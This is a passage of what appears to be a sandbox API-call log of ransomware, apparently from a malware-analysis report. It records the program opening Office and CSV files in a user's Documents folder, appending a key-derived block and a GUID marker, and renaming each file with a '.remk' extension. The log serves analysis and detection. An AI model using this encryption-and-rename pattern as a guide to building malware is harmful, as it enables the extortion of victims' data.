KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.910] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.910] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.911] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.911] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.911] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.911] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.911] GetLastError () returned 0x0 [0231.911] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.911] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.911] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.911] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.912] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.912] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.913] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x775d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.913] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.913] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.913] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.913] CloseHandle (hObject=0x640) returned 1 [0231.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0231.918] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ku2O6ZGXRTMM-OBcr5.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ku2o6zgxrtmm-obcr5.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ku2O6ZGXRTMM-OBcr5.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ku2o6zgxrtmm-obcr5.xlsx.remk")) returned 1 [0231.920] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ce8 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x31a4298 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e358 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e2f0 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dda8 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3e50 [0231.920] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ce8 [0231.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0231.921] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0231.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ce8 [0231.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3c70 [0231.921] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0231.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ce8 [0231.921] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x614d1880, ftCreationTime.dwHighDateTime=0x1d5ddd6, ftLastAccessTime.dwLowDateTime=0x94847160, ftLastAccessTime.dwHighDateTime=0x1d5e7f1, ftLastWriteTime.dwLowDateTime=0x94847160, ftLastWriteTime.dwHighDateTime=0x1d5e7f1, nFileSizeHigh=0x0, nFileSizeLow=0x14791, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NjadnpP4bXfTr.csv", cAlternateFileName="NJADNP~1.CSV")) returned 1 [0231.921] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NjadnpP4bXfTr.csv") returned=".csv" [0231.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NjadnpP4bXfTr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\njadnpp4bxftr.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.921] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=83857) returned 1 [0231.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.923] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1476b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.923] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.925] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x14791, lpOverlapped=0x0) returned 1 [0231.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.926] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.927] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.927] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.927] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.927] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.927] GetLastError () returned 0x0 [0231.927] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.927] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.927] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.927] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.927] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.928] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.928] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14791, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.928] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.928] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.928] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.929] CloseHandle (hObject=0x640) returned 1 [0231.930] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NjadnpP4bXfTr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\njadnpp4bxftr.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NjadnpP4bXfTr.csv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\njadnpp4bxftr.csv.remk")) returned 1 [0231.932] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0231.932] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32599fa0, ftCreationTime.dwHighDateTime=0x1d5de97, ftLastAccessTime.dwLowDateTime=0x6f35c8c0, ftLastAccessTime.dwHighDateTime=0x1d5b612, ftLastWriteTime.dwLowDateTime=0x6f35c8c0, ftLastWriteTime.dwHighDateTime=0x1d5b612, nFileSizeHigh=0x0, nFileSizeLow=0x9e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sRPKAC_i-r0gSL30it1J.docx", cAlternateFileName="SRPKAC~1.DOC")) returned 1 [0231.932] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sRPKAC_i-r0gSL30it1J.docx") returned=".docx" [0231.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sRPKAC_i-r0gSL30it1J.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\srpkac_i-r0gsl30it1j.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.932] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=2532) returned 1 [0231.932] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.934] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x9be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.934] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.935] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x9e4, lpOverlapped=0x0) returned 1 [0231.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.935] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.936] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.936] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.936] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.936] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.936] GetLastError () returned 0x0 [0231.936] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.937] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.937] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.937] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.937] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.937] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.937] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x9e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.937] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.937] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.937] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.937] CloseHandle (hObject=0x640) returned 1 [0231.939] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sRPKAC_i-r0gSL30it1J.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\srpkac_i-r0gsl30it1j.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sRPKAC_i-r0gSL30it1J.docx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\srpkac_i-r0gsl30it1j.docx.remk")) returned 1 [0231.996] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e9397a0, ftCreationTime.dwHighDateTime=0x1d56e1a, ftLastAccessTime.dwLowDateTime=0xfb46b990, ftLastAccessTime.dwHighDateTime=0x1d58ec7, ftLastWriteTime.dwLowDateTime=0xfb46b990, ftLastWriteTime.dwHighDateTime=0x1d58ec7, nFileSizeHigh=0x0, nFileSizeLow=0x1241d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv6Gg5.pptx", cAlternateFileName="SV6GG5~1.PPT")) returned 1 [0231.997] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sv6Gg5.pptx") returned=".pptx" [0231.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sv6Gg5.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sv6gg5.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.997] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=74781) returned 1 [0231.997] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.999] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x123f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.999] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.003] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1241d, lpOverlapped=0x0) returned 1 [0232.004] lstrlenA (lpString="-----BEGIN PUBLIC 